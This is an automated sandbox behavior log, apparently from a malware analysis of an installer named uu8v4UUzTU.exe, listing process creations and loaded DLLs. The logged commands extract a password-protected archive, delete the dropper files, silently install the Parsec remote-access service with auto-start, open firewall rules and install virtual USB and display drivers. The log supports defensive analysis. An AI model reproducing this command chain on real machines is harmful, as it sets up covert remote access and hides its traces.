Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "SoundNight.7z"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /SJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /SJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" stop ParsecJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" delete ParsecJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start Parsec
Source: C:\Program Files\Parsec\pservice.exeProcess created: unknown unknown
Source: C:\Program Files\Parsec\pservice.exeProcess created: unknown unknown
Source: C:\Program Files\Parsec\pservice.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vusb\parsec-vud.exe "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf" "9" "464910f03" "0000000000000158" "WinSta0\Default" "0000000000000160" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000158"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf" "9" "43799a85b" "0000000000000170" "WinSta0\Default" "0000000000000158" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "0000000000000158" "WinSta0\Default"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "0000000000000190" "WinSta0\Default"
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -r
Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vdd\parsec-vdd.exe "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\wevtutil.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: winhttpcom.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
